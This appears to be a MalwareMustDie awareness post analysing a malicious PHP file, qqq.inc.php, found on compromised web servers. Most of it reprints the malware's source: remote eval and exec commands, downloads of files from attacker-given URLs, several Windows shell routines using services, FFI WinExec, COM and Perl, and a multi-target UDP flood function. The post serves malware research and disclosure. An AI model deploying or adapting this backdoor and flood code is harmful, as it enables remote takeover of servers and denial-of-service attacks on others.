qqq.inc.php PHP Hacks aimed DDoS & Windows Remote Shell

# MalwareMustDie Awareness Post
# Case: Webapp/PHP (Read: Web Hacking)
# Target OS: Windows (with PHP and/or Perl)
# Interface: PHP (Flaw), Perl (Shell), FTP (Hacks) Remote Windows Executable Environment/commands
# Path: /qqq.inc.php
# UDP Flood, Services Remote Control, API Remote Shell
# Credit: Malware Hunter @malpush (twitter)

// Spotted base code (plain or after obfuscation)

1) { $evaled = ""; for($i = 1; $i < count($command); $i++) $evaled .= $command[$i];
if($lasteval != $evaled) { eval($evaled); $lasteval = $evaled; } } if($command[0] ==
 "eval" && count($command) > 1) { $evaled = ""; for($i = 1; $i < count($command); $i
++) $evaled .= $command[$i]; eval($evaled); } if($command[0] == "execonce" && count(
$command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec .= $c
ommand[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); if($lastexe
c != $toexec) { Exe($toexec); $lastexec = $toexec; } } if($command[0] == "exec" && c
ount($command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec
.= $command[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); Exe($t
oexec); } if($command[0] == "downonce" && count($command) == 3) { $command[1] = str_
replace("%LOLTMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTM
PLOL%", whereistmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command);
$i++) $todown .= $command[$i]; if($lastdown != $todown) { $content = @file_get_conte
nts($command[1]); file_put_contents($command[2], $content); $lastdown = $todown; } }
 if($command[0] == "down" && count($command) == 3) { $command[1] = str_replace("%LOL
TMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTMPLOL%", where
istmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command); $i++) $todown
 .= $command[$i]; $content = @file_get_contents($command[1]); file_put_contents($com
mand[2], $content); } $end = time(); $left = $time - ($end - $start); if($left > 0)
sleep($left); } } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=
getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path
'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_wr
itable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))retur
n '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if
(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))retu
rn $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_w
ritable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))re
turn $envtmp; return '.'; } function srvshelL($command) { $name=whereistmP()."\\".un
iqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system3
2\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=
>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win3
2_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $e
xec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($comm
and) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int
WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0)
; while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name);
 return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $comm
and"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) {
$perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_cont
ents(); ob_end_clean(); return $exec; } function Exe($command) { $exec=$output=''; $
dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob
_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} els
eif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$
output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@ex
ec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exis
ts('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$outp
ut=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);
} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!
feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($re
s);} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3))
 === 'WIN')$exec=winshelL($command); elseif(function_exists('win32_create_service')
&& strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command); elseif(exten
sion_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($com
mand); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } fu
nction udpflood($host,$port,$time,$packetsize) { $packet = ""; for($i=0;$i<$packetsi
ze;$i++) { $packet .= chr(rand(1,256)); } $end = time() + $time; $multitarget = fals
e; if(strpos($host, ",") !== FALSE) { $multitarget = true; $host = explode(",", $hos
t); } $i = 0; if($multitarget) { $fp = array(); foreach($host as $hostt) $fp[] = fso
ckopen("udp://".$hostt,$port,$e,$s,5); $count = count($host); while(true) { fwrite($
fp[$i % $count],$packet); fflush($fp[$i % $count]); if($i % 100 == 0) { if($end < ti
me()) break; } $i++; } foreach($fp as $fpp) fclose($fpp); } else { $fp = fsockopen("
udp://".$host,$port,$e,$s,5); while(true) { fwrite($fp,$packet); fflush($fp); if($i
% 100 == 0) { if($end < time()) break; } $i++; } fclose($fp); } $env = $i *
 $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel);
$env = round($env); }

// -----------------------------------------------------
// Below part is the information of
// some breakdown of the evil function (after beautified)
// -----------------------------------------------------

// PoC Conditions used for remote controls:

elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) ===
'WIN') $exec = winshelL($command);
elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) ===
'WIN') $exec = srvshelL($command);
elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec =
ffishelL($command);
elseif (extension_loaded('perl')) $exec = perlshelL($command);
return $exec;
}

// DDoS / UDP Flooder:

function udpflood($host, $port, $time, $packetsize)
{
$packet = "";
for ($i = 0; $i < $packetsize; $i++)
{
$packet.= chr(rand(1, 256));
}

$end = time() + $time;
$multitarget = false;
if (strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}

$i = 0;
if ($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://" . $hostt, $port, $e, $s, 5);
$count = count($host);
while (true)
{
fwrite($fp[$i % $count], $packet);
fflush($fp[$i % $count]);
if ($i % 100 == 0)
{
if ($end < time()) break;
}

$i++;
}

foreach($fp as $fpp) fclose($fpp);
}
  else
{
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true)
{
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0)
{
if ($end < time()) break;
}

$i++;
}

fclose($fp);
}

$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
}

// Remote shell..(Windows EXE)

$output = join("\n", $output);
$exec = $output;
}
elseif (function_exists('shell_exec')) $exec = @shell_exec($command);
elseif (function_exists('popen'))
{
$output = @popen($command, 'r');
while (!feof($output))
{
$exec = fgets($output);
}

pclose($output);
}
elseif (function_exists('proc_open'))
{
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1]))
{
$line = fgets($pipes[1]);
$output.= $line;
}

$exec = $output;
proc_close($res);
}
elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = winshelL($command);
elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = srvshelL($command);
elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = ffishelL($command);
elseif (extension_loaded('perl')) $exec = perlshelL($command);
return $exec;}

// Perl Shell:


function perlshelL($command)
{
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}

// CMD Shell

function comshelL($command, $ws)
{
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}

// ffishell

function ffishelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while (!file_exists($name)) sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;

// And many more information exclussive for MMD forum members.

# MalwareMustDie!!
# Reported by @unixfreaxjp | $ date
Sun Jan  5 22:21:58 JST 2014